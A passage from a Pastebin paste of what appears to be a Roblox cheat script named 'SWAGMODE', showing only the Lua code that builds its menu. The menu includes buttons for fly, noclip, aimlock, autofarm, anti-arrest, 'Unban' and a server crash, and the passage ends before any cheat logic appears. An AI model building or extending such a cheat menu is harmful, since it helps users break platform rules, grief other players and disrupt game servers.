2021_pogg

xdoe

Sep 16th, 2021
12
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 167.09 KB | None | 0 0
  1. if not game:IsLoaded() then
  2. game.Loaded:Wait()
  3. end
  4.  
  5. local Swagmode = Instance.new("ScreenGui")
  6. local SwagmodeFrame = Instance.new("Frame")
  7. local MenuFrame = Instance.new("Frame")
  8. local TogglesButton = Instance.new("TextButton")
  9. local QuickTpButton = Instance.new("TextButton")
  10. local SideButton = Instance.new("TextButton")
  11. local imiecredits = Instance.new("TextLabel")
  12. local Swagmode_2 = Instance.new("TextLabel")
  13. local UIGradient = Instance.new("UIGradient")
  14. local Frame = Instance.new("Frame")
  15. local MainButton = Instance.new("TextButton")
  16. local SellingButton = Instance.new("TextButton")
  17. local DropShadowHolder = Instance.new("Frame")
  18. local DropShadow = Instance.new("ImageLabel")
  19. local TopLine = Instance.new("Frame")
  20. local SideInfo = Instance.new("Frame")
  21. local TargetImage = Instance.new("ImageLabel")
  22. local UICorner = Instance.new("UICorner")
  23. local SetNearestButton = Instance.new("TextButton")
  24. local CashLabel = Instance.new("TextLabel")
  25. local TargetTextbox = Instance.new("TextBox")
  26. local BountyLabel = Instance.new("TextLabel")
  27. local CrewLabel = Instance.new("TextButton")
  28. local Buttons = Instance.new("Frame")
  29. local MainFrame = Instance.new("Frame")
  30. local FreeFists = Instance.new("TextButton")
  31. local GodBlock = Instance.new("TextButton")
  32. local GodArmor = Instance.new("TextButton")
  33. local FlySpeedMinus = Instance.new("TextButton")
  34. local Fly = Instance.new("TextButton")
  35. local Fling = Instance.new("TextButton")
  36. local NoRecoil = Instance.new("TextButton")
  37. local GoTo = Instance.new("TextButton")
  38. local View = Instance.new("TextButton")
  39. local Target = Instance.new("TextButton")
  40. local FlySpeedPlus = Instance.new("TextButton")
  41. local NoClip = Instance.new("TextButton")
  42. local FlyMode = Instance.new("TextButton")
  43. local Reach = Instance.new("TextButton")
  44. local Headless = Instance.new("TextButton")
  45. local QuickTpFrame = Instance.new("Frame")
  46. local GunShop2 = Instance.new("TextButton")
  47. local PrevPosition = Instance.new("TextButton")
  48. local Bank = Instance.new("TextButton")
  49. local SafeZone1 = Instance.new("TextButton")
  50. local SetSpawn = Instance.new("TextButton")
  51. local Sewer = Instance.new("TextButton")
  52. local Playground = Instance.new("TextButton")
  53. local GasStation = Instance.new("TextButton")
  54. local LavaBase = Instance.new("TextButton")
  55. local SavePos = Instance.new("TextButton")
  56. local SafeZone2 = Instance.new("TextButton")
  57. local UFO = Instance.new("TextButton")
  58. local TacoShop = Instance.new("TextButton")
  59. local LoadPos = Instance.new("TextButton")
  60. local GunShop1 = Instance.new("TextButton")
  61. local SideScriptsFrame = Instance.new("Frame")
  62. local Aimlock = Instance.new("TextButton")
  63. local Users = Instance.new("TextButton")
  64. local MoneyESP = Instance.new("TextButton")
  65. local FullGod = Instance.new("TextButton")
  66. local Autofarm = Instance.new("TextButton")
  67. local HighTool = Instance.new("TextButton")
  68. local Esp = Instance.new("TextButton")
  69. local LastingBullets = Instance.new("TextButton")
  70. local GrenadeLock = Instance.new("TextButton")
  71. local Spin = Instance.new("TextButton")
  72. local Unban = Instance.new("TextButton")
  73. local TaserLock = Instance.new("TextButton")
  74. local RpgLock = Instance.new("TextButton")
  75. local Invisible = Instance.new("TextButton")
  76. local InfTools = Instance.new("TextButton")
  77. local TogglesFrame = Instance.new("Frame")
  78. local QToTp = Instance.new("TextButton")
  79. local QToTpColor = Instance.new("TextLabel")
  80. local HideBlock = Instance.new("TextButton")
  81. local HideBlockColor = Instance.new("TextLabel")
  82. local HideUser = Instance.new("TextButton")
  83. local HideUserColor = Instance.new("TextLabel")
  84. local AutoStomp = Instance.new("TextButton")
  85. local AutoStompColor = Instance.new("TextLabel")
  86. local RocketRide = Instance.new("TextButton")
  87. local RocketRideColor = Instance.new("TextLabel")
  88. local AntiArrest = Instance.new("TextButton")
  89. local AntiArrestColor = Instance.new("TextLabel")
  90. local AntiGrab = Instance.new("TextButton")
  91. local AntiGrabColor = Instance.new("TextLabel")
  92. local AutoDrop = Instance.new("TextButton")
  93. local AutoDropColor = Instance.new("TextLabel")
  94. local AntiStomp = Instance.new("TextButton")
  95. local AntiStompColor = Instance.new("TextLabel")
  96. local AutoBlock = Instance.new("TextButton")
  97. local AutoBlockColor = Instance.new("TextLabel")
  98. local CashAura = Instance.new("TextButton")
  99. local CashAuraColor = Instance.new("TextLabel")
  100. local AntiEffects = Instance.new("TextButton")
  101. local AntiEffectsColor = Instance.new("TextLabel")
  102. local AltArmor = Instance.new("TextButton")
  103. local AltArmorColor = Instance.new("TextLabel")
  104. local AntiBag = Instance.new("TextButton")
  105. local AntiBagColor = Instance.new("TextLabel")
  106. local AntiSlow = Instance.new("TextButton")
  107. local AntiSlowColor = Instance.new("TextLabel")
  108. local SellingFrame = Instance.new("Frame")
  109. local CashTextbox = Instance.new("TextBox")
  110. local CashDropperTitle = Instance.new("TextLabel")
  111. local CalculateButton = Instance.new("TextButton")
  112. local DropToggleButton = Instance.new("TextButton")
  113. local CashDroppedLabel = Instance.new("TextLabel")
  114. local CashAtEndLabel = Instance.new("TextLabel")
  115. local Frame_2 = Instance.new("Frame")
  116. local CrashServerButton = Instance.new("TextButton")
  117.  
  118. --Properties:
  119. Swagmode.Name = "Swagmode"
  120. Swagmode.Parent = game.CoreGui
  121. Swagmode.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
  122.  
  123. SwagmodeFrame.Name = "SwagmodeFrame"
  124. SwagmodeFrame.Parent = Swagmode
  125. SwagmodeFrame.BackgroundColor3 = Color3.fromRGB(60, 60, 60)
  126. SwagmodeFrame.BorderSizePixel = 0
  127. SwagmodeFrame.Position = UDim2.new(0.212884605, 0, 0.190036908, 0)
  128. SwagmodeFrame.Size = UDim2.new(0, 605, 0, 336)
  129.  
  130. MenuFrame.Name = "MenuFrame"
  131. MenuFrame.Parent = SwagmodeFrame
  132. MenuFrame.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  133. MenuFrame.BorderSizePixel = 0
  134. MenuFrame.Size = UDim2.new(0, 155, 0, 336)
  135.  
  136. TogglesButton.Name = "TogglesButton"
  137. TogglesButton.Parent = MenuFrame
  138. TogglesButton.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
  139. TogglesButton.BorderSizePixel = 0
  140. TogglesButton.Position = UDim2.new(0.0922105312, 0, 0.440625668, 0)
  141. TogglesButton.Size = UDim2.new(0, 123, 0, 31)
  142. TogglesButton.AutoButtonColor = false
  143. TogglesButton.Font = Enum.Font.GothamBlack
  144. TogglesButton.Text = "Toggles"
  145. TogglesButton.TextColor3 = Color3.fromRGB(255, 255, 255)
  146. TogglesButton.TextSize = 14.000
  147.  
  148. QuickTpButton.Name = "QuickTpButton"
  149. QuickTpButton.Parent = MenuFrame
  150. QuickTpButton.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
  151. QuickTpButton.BorderSizePixel = 0
  152. QuickTpButton.Position = UDim2.new(0.0922105312, 0, 0.573581994, 0)
  153. QuickTpButton.Size = UDim2.new(0, 123, 0, 31)
  154. QuickTpButton.AutoButtonColor = false
  155. QuickTpButton.Font = Enum.Font.GothamBlack
  156. QuickTpButton.Text = "Quick TP"
  157. QuickTpButton.TextColor3 = Color3.fromRGB(255, 255, 255)
  158. QuickTpButton.TextSize = 14.000
  159.  
  160. SideButton.Name = "SideButton"
  161. SideButton.Parent = MenuFrame
  162. SideButton.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
  163. SideButton.BorderSizePixel = 0
  164. SideButton.Position = UDim2.new(0.0922105312, 0, 0.307098716, 0)
  165. SideButton.Size = UDim2.new(0, 123, 0, 31)
  166. SideButton.AutoButtonColor = false
  167. SideButton.Font = Enum.Font.GothamBlack
  168. SideButton.Text = "Side Scripts"
  169. SideButton.TextColor3 = Color3.fromRGB(255, 255, 255)
  170. SideButton.TextSize = 14.000
  171.  
  172. imiecredits.Name = "imiecredits"
  173. imiecredits.Parent = MenuFrame
  174. imiecredits.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  175. imiecredits.BackgroundTransparency = 1.000
  176. imiecredits.BorderSizePixel = 0
  177. imiecredits.Position = UDim2.new(0.0507245474, 0, 0.854166687, 0)
  178. imiecredits.Size = UDim2.new(0, 137, 0, 48)
  179. imiecredits.Font = Enum.Font.GothamBold
  180. imiecredits.Text = "credits"
  181. imiecredits.TextColor3 = Color3.fromRGB(255, 255, 255)
  182. imiecredits.TextSize = 14.000
  183. imiecredits.TextXAlignment = Enum.TextXAlignment.Left
  184. imiecredits.TextYAlignment = Enum.TextYAlignment.Top
  185.  
  186. Swagmode_2.Name = "Swagmode"
  187. Swagmode_2.Parent = MenuFrame
  188. Swagmode_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  189. Swagmode_2.BackgroundTransparency = 1.000
  190. Swagmode_2.Position = UDim2.new(0.045161292, 0, 0, 0)
  191. Swagmode_2.Size = UDim2.new(0, 115, 0, 34)
  192. Swagmode_2.Font = Enum.Font.GothamBlack
  193. Swagmode_2.Text = "SWAGMODE"
  194. Swagmode_2.TextColor3 = Color3.fromRGB(255, 255, 255)
  195. Swagmode_2.TextSize = 20.000
  196.  
  197. UIGradient.Color = ColorSequence.new{ColorSequenceKeypoint.new(0.00, Color3.fromRGB(49, 48, 70)), ColorSequenceKeypoint.new(1.00, Color3.fromRGB(255, 255, 255))}
  198. UIGradient.Offset = Vector2.new(0.100000001, 0)
  199. UIGradient.Parent = Swagmode_2
  200.  
  201. Frame.Parent = MenuFrame
  202. Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  203. Frame.BorderSizePixel = 0
  204. Frame.Position = UDim2.new(0.045161292, 0, 0.092261903, 0)
  205. Frame.Size = UDim2.new(0, 126, 0, 3)
  206.  
  207. MainButton.Name = "MainButton"
  208. MainButton.Parent = MenuFrame
  209. MainButton.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
  210. MainButton.BorderSizePixel = 0
  211. MainButton.Position = UDim2.new(0.0922105238, 0, 0.178689778, 0)
  212. MainButton.Size = UDim2.new(0, 123, 0, 31)
  213. MainButton.AutoButtonColor = false
  214. MainButton.Font = Enum.Font.GothamBlack
  215. MainButton.Text = "Main Scripts"
  216. MainButton.TextColor3 = Color3.fromRGB(255, 255, 255)
  217. MainButton.TextSize = 14.000
  218.  
  219. SellingButton.Name = "SellingButton"
  220. SellingButton.Parent = MenuFrame
  221. SellingButton.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
  222. SellingButton.BorderSizePixel = 0
  223. SellingButton.Position = UDim2.new(0.0986621454, 0, 0.716439128, 0)
  224. SellingButton.Size = UDim2.new(0, 123, 0, 31)
  225. SellingButton.AutoButtonColor = false
  226. SellingButton.Font = Enum.Font.GothamBlack
  227. SellingButton.Text = "Selling Tools"
  228. SellingButton.TextColor3 = Color3.fromRGB(255, 255, 255)
  229. SellingButton.TextSize = 14.000
  230.  
  231. DropShadowHolder.Name = "DropShadowHolder"
  232. DropShadowHolder.Parent = SwagmodeFrame
  233. DropShadowHolder.BackgroundTransparency = 1.000
  234. DropShadowHolder.BorderSizePixel = 0
  235. DropShadowHolder.Size = UDim2.new(1, 0, 1, 0)
  236. DropShadowHolder.ZIndex = 0
  237.  
  238. DropShadow.Name = "DropShadow"
  239. DropShadow.Parent = DropShadowHolder
  240. DropShadow.AnchorPoint = Vector2.new(0.5, 0.5)
  241. DropShadow.BackgroundTransparency = 1.000
  242. DropShadow.BorderSizePixel = 0
  243. DropShadow.Position = UDim2.new(0.5, 0, 0.5, 0)
  244. DropShadow.Size = UDim2.new(1, 47, 1, 47)
  245. DropShadow.ZIndex = 0
  246. DropShadow.Image = "rbxassetid://6015897843"
  247. DropShadow.ImageColor3 = Color3.fromRGB(0, 0, 0)
  248. DropShadow.ImageTransparency = 0.200
  249. DropShadow.ScaleType = Enum.ScaleType.Slice
  250. DropShadow.SliceCenter = Rect.new(49, 49, 450, 450)
  251.  
  252. TopLine.Name = "TopLine"
  253. TopLine.Parent = SwagmodeFrame
  254. TopLine.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  255. TopLine.BorderSizePixel = 0
  256. TopLine.Position = UDim2.new(0.256198347, 0, 0, 0)
  257. TopLine.Size = UDim2.new(0, 450, 0, 7)
  258.  
  259. SideInfo.Name = "SideInfo"
  260. SideInfo.Parent = SwagmodeFrame
  261. SideInfo.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  262. SideInfo.BorderSizePixel = 0
  263. SideInfo.Position = UDim2.new(0.778512418, 0, 0.020833334, 0)
  264. SideInfo.Size = UDim2.new(0, 134, 0, 329)
  265.  
  266. TargetImage.Name = "TargetImage"
  267. TargetImage.Parent = SideInfo
  268. TargetImage.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
  269. TargetImage.Position = UDim2.new(0.0950299203, 0, 0.0244709235, 0)
  270. TargetImage.Size = UDim2.new(0, 108, 0, 104)
  271. TargetImage.Image = "rbxasset://textures/ui/GuiImagePlaceholder.png"
  272. TargetImage.ImageColor3 = Color3.fromRGB(300, 300, 300)
  273.  
  274. UICorner.CornerRadius = UDim.new(0, 500)
  275. UICorner.Parent = TargetImage
  276.  
  277. SetNearestButton.Name = "SetNearestButton"
  278. SetNearestButton.Parent = SideInfo
  279. SetNearestButton.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
  280. SetNearestButton.BorderSizePixel = 0
  281. SetNearestButton.Position = UDim2.new(0.072641857, 0, 0.851063848, 0)
  282. SetNearestButton.Size = UDim2.new(0, 114, 0, 29)
  283. SetNearestButton.AutoButtonColor = false
  284. SetNearestButton.Font = Enum.Font.GothamBlack
  285. SetNearestButton.Text = "Set Nearest"
  286. SetNearestButton.TextColor3 = Color3.fromRGB(255, 255, 255)
  287. SetNearestButton.TextSize = 14.000
  288.  
  289. CashLabel.Name = "CashLabel"
  290. CashLabel.Parent = SideInfo
  291. CashLabel.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
  292. CashLabel.BorderSizePixel = 0
  293. CashLabel.Position = UDim2.new(0.072641857, 0, 0.519756854, 0)
  294. CashLabel.Size = UDim2.new(0, 115, 0, 26)
  295. CashLabel.Font = Enum.Font.SourceSans
  296. CashLabel.Text = "Cash:"
  297. CashLabel.TextColor3 = Color3.fromRGB(72, 72, 72)
  298. CashLabel.TextSize = 14.000
  299.  
  300. TargetTextbox.Name = "TargetTextbox"
  301. TargetTextbox.Parent = SideInfo
  302. TargetTextbox.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
  303. TargetTextbox.BorderSizePixel = 0
  304. TargetTextbox.Position = UDim2.new(0.072641857, 0, 0.392097205, 0)
  305. TargetTextbox.Size = UDim2.new(0, 115, 0, 31)
  306. TargetTextbox.Font = Enum.Font.GothamBlack
  307. TargetTextbox.PlaceholderColor3 = Color3.fromRGB(255, 255, 255)
  308. TargetTextbox.Text = ""
  309. TargetTextbox.TextColor3 = Color3.fromRGB(255, 255, 255)
  310. TargetTextbox.TextSize = 14.000
  311. TargetTextbox.TextWrapped = true
  312. TargetTextbox.TextScaled = true
  313.  
  314. BountyLabel.Name = "BountyLabel"
  315. BountyLabel.Parent = SideInfo
  316. BountyLabel.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
  317. BountyLabel.BorderSizePixel = 0
  318. BountyLabel.Position = UDim2.new(0.072641857, 0, 0.633550763, 0)
  319. BountyLabel.Size = UDim2.new(0, 115, 0, 26)
  320. BountyLabel.Font = Enum.Font.SourceSans
  321. BountyLabel.Text = "Bounty:"
  322. BountyLabel.TextColor3 = Color3.fromRGB(72, 72, 72)
  323. BountyLabel.TextSize = 14.000
  324.  
  325. CrewLabel.Name = "CrewLabel"
  326. CrewLabel.Parent = SideInfo
  327. CrewLabel.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
  328. CrewLabel.BorderSizePixel = 0
  329. CrewLabel.Position = UDim2.new(0.072641857, 0, 0.737304032, 0)
  330. CrewLabel.Size = UDim2.new(0, 115, 0, 26)
  331. CrewLabel.Font = Enum.Font.SourceSans
  332. CrewLabel.Text = "Crew:"
  333. CrewLabel.TextColor3 = Color3.fromRGB(72, 72, 72)
  334. CrewLabel.TextSize = 14.000
  335. CrewLabel.TextScaled = true
  336.  
  337. Buttons.Name = "Buttons"
  338. Buttons.Parent = SwagmodeFrame
  339. Buttons.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  340. Buttons.BackgroundTransparency = 1.000
  341. Buttons.Position = UDim2.new(0.256198347, 0, 0.0297619049, 0)
  342. Buttons.Size = UDim2.new(0, 316, 0, 325)
  343.  
  344. MainFrame.Name = "MainFrame"
  345. MainFrame.Parent = Buttons
  346. MainFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  347. MainFrame.BackgroundTransparency = 1.000
  348. MainFrame.Size = UDim2.new(0, 316, 0, 325)
  349. MainFrame.Visible = true
  350.  
  351. FreeFists.Name = "FreeFists"
  352. FreeFists.Parent = MainFrame
  353. FreeFists.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  354. FreeFists.BorderSizePixel = 0
  355. FreeFists.Position = UDim2.new(0.0218890235, 0, 0.590557039, 0)
  356. FreeFists.Size = UDim2.new(0, 94, 0, 46)
  357. FreeFists.Font = Enum.Font.GothamBlack
  358. FreeFists.Text = "FreeFists(T)"
  359. FreeFists.TextColor3 = Color3.fromRGB(255, 255, 255)
  360. FreeFists.TextSize = 14.000
  361.  
  362. GodBlock.Name = "GodBlock"
  363. GodBlock.Parent = MainFrame
  364. GodBlock.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  365. GodBlock.BorderSizePixel = 0
  366. GodBlock.Position = UDim2.new(0.0251458082, 0, 0.0399999991, 0)
  367. GodBlock.Size = UDim2.new(0, 94, 0, 46)
  368. GodBlock.Font = Enum.Font.GothamBlack
  369. GodBlock.Text = "GodBlock"
  370. GodBlock.TextColor3 = Color3.fromRGB(255, 255, 255)
  371. GodBlock.TextSize = 14.000
  372.  
  373. GodArmor.Name = "GodArmor"
  374. GodArmor.Parent = MainFrame
  375. GodArmor.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  376. GodArmor.BorderSizePixel = 0
  377. GodArmor.Position = UDim2.new(0.024917312, 0, 0.221326202, 0)
  378. GodArmor.Size = UDim2.new(0, 94, 0, 46)
  379. GodArmor.Font = Enum.Font.GothamBlack
  380. GodArmor.Text = "GodArmor"
  381. GodArmor.TextColor3 = Color3.fromRGB(255, 255, 255)
  382. GodArmor.TextSize = 14.000
  383.  
  384. FlySpeedMinus.Name = "FlySpeedMinus"
  385. FlySpeedMinus.Parent = MainFrame
  386. FlySpeedMinus.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  387. FlySpeedMinus.BorderSizePixel = 0
  388. FlySpeedMinus.Position = UDim2.new(0.0218890235, 0, 0.762864709, 0)
  389. FlySpeedMinus.Size = UDim2.new(0, 94, 0, 46)
  390. FlySpeedMinus.Font = Enum.Font.GothamBlack
  391. FlySpeedMinus.Text = "FlySpeed -"
  392. FlySpeedMinus.TextColor3 = Color3.fromRGB(255, 255, 255)
  393. FlySpeedMinus.TextSize = 14.000
  394.  
  395. Fly.Name = "Fly"
  396. Fly.Parent = MainFrame
  397. Fly.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  398. Fly.BorderSizePixel = 0
  399. Fly.Position = UDim2.new(0.351977378, 0, 0.762864709, 0)
  400. Fly.Size = UDim2.new(0, 94, 0, 46)
  401. Fly.Font = Enum.Font.GothamBlack
  402. Fly.Text = "Fly(X)"
  403. Fly.TextColor3 = Color3.fromRGB(255, 255, 255)
  404. Fly.TextSize = 14.000
  405.  
  406. Fling.Name = "Fling"
  407. Fling.Parent = MainFrame
  408. Fling.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  409. Fling.BorderSizePixel = 0
  410. Fling.Position = UDim2.new(0.352205783, 0, 0.409230769, 0)
  411. Fling.Size = UDim2.new(0, 94, 0, 46)
  412. Fling.Font = Enum.Font.GothamBlack
  413. Fling.Text = "Fling"
  414. Fling.TextColor3 = Color3.fromRGB(255, 255, 255)
  415. Fling.TextSize = 14.000
  416.  
  417. NoRecoil.Name = "NoRecoil"
  418. NoRecoil.Parent = MainFrame
  419. NoRecoil.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  420. NoRecoil.BorderSizePixel = 0
  421. NoRecoil.Position = UDim2.new(0.355005682, 0, 0.221326202, 0)
  422. NoRecoil.Size = UDim2.new(0, 94, 0, 46)
  423. NoRecoil.Font = Enum.Font.GothamBlack
  424. NoRecoil.Text = "NoRecoil"
  425. NoRecoil.TextColor3 = Color3.fromRGB(255, 255, 255)
  426. NoRecoil.TextSize = 14.000
  427.  
  428. GoTo.Name = "GoTo"
  429. GoTo.Parent = MainFrame
  430. GoTo.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  431. GoTo.BorderSizePixel = 0
  432. GoTo.Position = UDim2.new(0.678155124, 0, 0.409230769, 0)
  433. GoTo.Size = UDim2.new(0, 94, 0, 46)
  434. GoTo.Font = Enum.Font.GothamBlack
  435. GoTo.Text = "GoTo"
  436. GoTo.TextColor3 = Color3.fromRGB(255, 255, 255)
  437. GoTo.TextSize = 14.000
  438.  
  439. View.Name = "View"
  440. View.Parent = MainFrame
  441. View.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  442. View.BorderSizePixel = 0
  443. View.Position = UDim2.new(0.680955052, 0, 0.221326202, 0)
  444. View.Size = UDim2.new(0, 94, 0, 46)
  445. View.Font = Enum.Font.GothamBlack
  446. View.Text = "View"
  447. View.TextColor3 = Color3.fromRGB(255, 255, 255)
  448. View.TextSize = 14.000
  449.  
  450. Target.Name = "Target"
  451. Target.Parent = MainFrame
  452. Target.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  453. Target.BorderSizePixel = 0
  454. Target.Position = UDim2.new(0.681183517, 0, 0.0399999991, 0)
  455. Target.Size = UDim2.new(0, 94, 0, 46)
  456. Target.Font = Enum.Font.GothamBlack
  457. Target.Text = "Target"
  458. Target.TextColor3 = Color3.fromRGB(255, 255, 255)
  459. Target.TextSize = 14.000
  460.  
  461. FlySpeedPlus.Name = "FlySpeedPlus"
  462. FlySpeedPlus.Parent = MainFrame
  463. FlySpeedPlus.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  464. FlySpeedPlus.BorderSizePixel = 0
  465. FlySpeedPlus.Position = UDim2.new(0.677926719, 0, 0.762864709, 0)
  466. FlySpeedPlus.Size = UDim2.new(0, 94, 0, 46)
  467. FlySpeedPlus.Font = Enum.Font.GothamBlack
  468. FlySpeedPlus.Text = "FlySpeed +"
  469. FlySpeedPlus.TextColor3 = Color3.fromRGB(255, 255, 255)
  470. FlySpeedPlus.TextSize = 14.000
  471.  
  472. NoClip.Name = "NoClip"
  473. NoClip.Parent = MainFrame
  474. NoClip.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  475. NoClip.BorderSizePixel = 0
  476. NoClip.Position = UDim2.new(0.677926719, 0, 0.590557039, 0)
  477. NoClip.Size = UDim2.new(0, 94, 0, 46)
  478. NoClip.Font = Enum.Font.GothamBlack
  479. NoClip.Text = "NoClip(Z)"
  480. NoClip.TextColor3 = Color3.fromRGB(255, 255, 255)
  481. NoClip.TextSize = 14.000
  482.  
  483. FlyMode.Name = "FlyMode"
  484. FlyMode.Parent = MainFrame
  485. FlyMode.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  486. FlyMode.BorderSizePixel = 0
  487. FlyMode.Position = UDim2.new(0.351977378, 0, 0.590557039, 0)
  488. FlyMode.Size = UDim2.new(0, 94, 0, 46)
  489. FlyMode.Font = Enum.Font.GothamBlack
  490. FlyMode.Text = "FlyMode"
  491. FlyMode.TextColor3 = Color3.fromRGB(255, 255, 255)
  492. FlyMode.TextSize = 14.000
  493.  
  494. Reach.Name = "Reach"
  495. Reach.Parent = MainFrame
  496. Reach.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  497. Reach.BorderSizePixel = 0
  498. Reach.Position = UDim2.new(0.355234176, 0, 0.0399999991, 0)
  499. Reach.Size = UDim2.new(0, 94, 0, 46)
  500. Reach.Font = Enum.Font.GothamBlack
  501. Reach.Text = "Reach"
  502. Reach.TextColor3 = Color3.fromRGB(255, 255, 255)
  503. Reach.TextSize = 14.000
  504.  
  505. Headless.Name = "Headless"
  506. Headless.Parent = MainFrame
  507. Headless.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  508. Headless.BorderSizePixel = 0
  509. Headless.Position = UDim2.new(0.0221175179, 0, 0.409230769, 0)
  510. Headless.Size = UDim2.new(0, 94, 0, 46)
  511. Headless.Font = Enum.Font.GothamBlack
  512. Headless.Text = "Headless"
  513. Headless.TextColor3 = Color3.fromRGB(255, 255, 255)
  514. Headless.TextSize = 14.000
  515.  
  516. QuickTpFrame.Name = "QuickTpFrame"
  517. QuickTpFrame.Parent = Buttons
  518. QuickTpFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  519. QuickTpFrame.BackgroundTransparency = 1.000
  520. QuickTpFrame.Size = UDim2.new(0, 316, 0, 325)
  521. QuickTpFrame.Visible = false
  522.  
  523. GunShop2.Name = "GunShop2"
  524. GunShop2.Parent = QuickTpFrame
  525. GunShop2.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  526. GunShop2.BorderSizePixel = 0
  527. GunShop2.Position = UDim2.new(0.0218890235, 0, 0.590557039, 0)
  528. GunShop2.Size = UDim2.new(0, 94, 0, 46)
  529. GunShop2.Font = Enum.Font.GothamBlack
  530. GunShop2.Text = "GunShop(UP)"
  531. GunShop2.TextColor3 = Color3.fromRGB(255, 255, 255)
  532. GunShop2.TextSize = 14.000
  533.  
  534. PrevPosition.Name = "PrevPosition"
  535. PrevPosition.Parent = QuickTpFrame
  536. PrevPosition.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  537. PrevPosition.BorderSizePixel = 0
  538. PrevPosition.Position = UDim2.new(0.0251458082, 0, 0.0399999991, 0)
  539. PrevPosition.Size = UDim2.new(0, 94, 0, 46)
  540. PrevPosition.Font = Enum.Font.GothamBlack
  541. PrevPosition.Text = "PrevPos"
  542. PrevPosition.TextColor3 = Color3.fromRGB(255, 255, 255)
  543. PrevPosition.TextSize = 14.000
  544.  
  545. Bank.Name = "Bank"
  546. Bank.Parent = QuickTpFrame
  547. Bank.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  548. Bank.BorderSizePixel = 0
  549. Bank.Position = UDim2.new(0.024917312, 0, 0.221326202, 0)
  550. Bank.Size = UDim2.new(0, 94, 0, 46)
  551. Bank.Font = Enum.Font.GothamBlack
  552. Bank.Text = "Bank"
  553. Bank.TextColor3 = Color3.fromRGB(255, 255, 255)
  554. Bank.TextSize = 14.000
  555.  
  556. SafeZone1.Name = "SafeZone1"
  557. SafeZone1.Parent = QuickTpFrame
  558. SafeZone1.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  559. SafeZone1.BorderSizePixel = 0
  560. SafeZone1.Position = UDim2.new(0.0218890235, 0, 0.762864709, 0)
  561. SafeZone1.Size = UDim2.new(0, 94, 0, 46)
  562. SafeZone1.Font = Enum.Font.GothamBlack
  563. SafeZone1.Text = "Safe Zone #1"
  564. SafeZone1.TextColor3 = Color3.fromRGB(255, 255, 255)
  565. SafeZone1.TextSize = 14.000
  566.  
  567. SetSpawn.Name = "SetSpawn"
  568. SetSpawn.Parent = QuickTpFrame
  569. SetSpawn.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  570. SetSpawn.BorderSizePixel = 0
  571. SetSpawn.Position = UDim2.new(0.351977378, 0, 0.762864709, 0)
  572. SetSpawn.Size = UDim2.new(0, 94, 0, 46)
  573. SetSpawn.Font = Enum.Font.GothamBlack
  574. SetSpawn.Text = "SetSpawn"
  575. SetSpawn.TextColor3 = Color3.fromRGB(255, 255, 255)
  576. SetSpawn.TextSize = 14.000
  577.  
  578. Sewer.Name = "Sewer"
  579. Sewer.Parent = QuickTpFrame
  580. Sewer.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  581. Sewer.BorderSizePixel = 0
  582. Sewer.Position = UDim2.new(0.352205783, 0, 0.409230769, 0)
  583. Sewer.Size = UDim2.new(0, 94, 0, 46)
  584. Sewer.Font = Enum.Font.GothamBlack
  585. Sewer.Text = "Sewer"
  586. Sewer.TextColor3 = Color3.fromRGB(255, 255, 255)
  587. Sewer.TextSize = 14.000
  588.  
  589. Playground.Name = "Playground"
  590. Playground.Parent = QuickTpFrame
  591. Playground.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  592. Playground.BorderSizePixel = 0
  593. Playground.Position = UDim2.new(0.355005682, 0, 0.221326202, 0)
  594. Playground.Size = UDim2.new(0, 94, 0, 46)
  595. Playground.Font = Enum.Font.GothamBlack
  596. Playground.Text = "Playground"
  597. Playground.TextColor3 = Color3.fromRGB(255, 255, 255)
  598. Playground.TextSize = 14.000
  599.  
  600. GasStation.Name = "GasStation"
  601. GasStation.Parent = QuickTpFrame
  602. GasStation.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  603. GasStation.BorderSizePixel = 0
  604. GasStation.Position = UDim2.new(0.678155124, 0, 0.409230769, 0)
  605. GasStation.Size = UDim2.new(0, 94, 0, 46)
  606. GasStation.Font = Enum.Font.GothamBlack
  607. GasStation.Text = "GasStation"
  608. GasStation.TextColor3 = Color3.fromRGB(255, 255, 255)
  609. GasStation.TextSize = 14.000
  610.  
  611. LavaBase.Name = "LavaBase"
  612. LavaBase.Parent = QuickTpFrame
  613. LavaBase.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
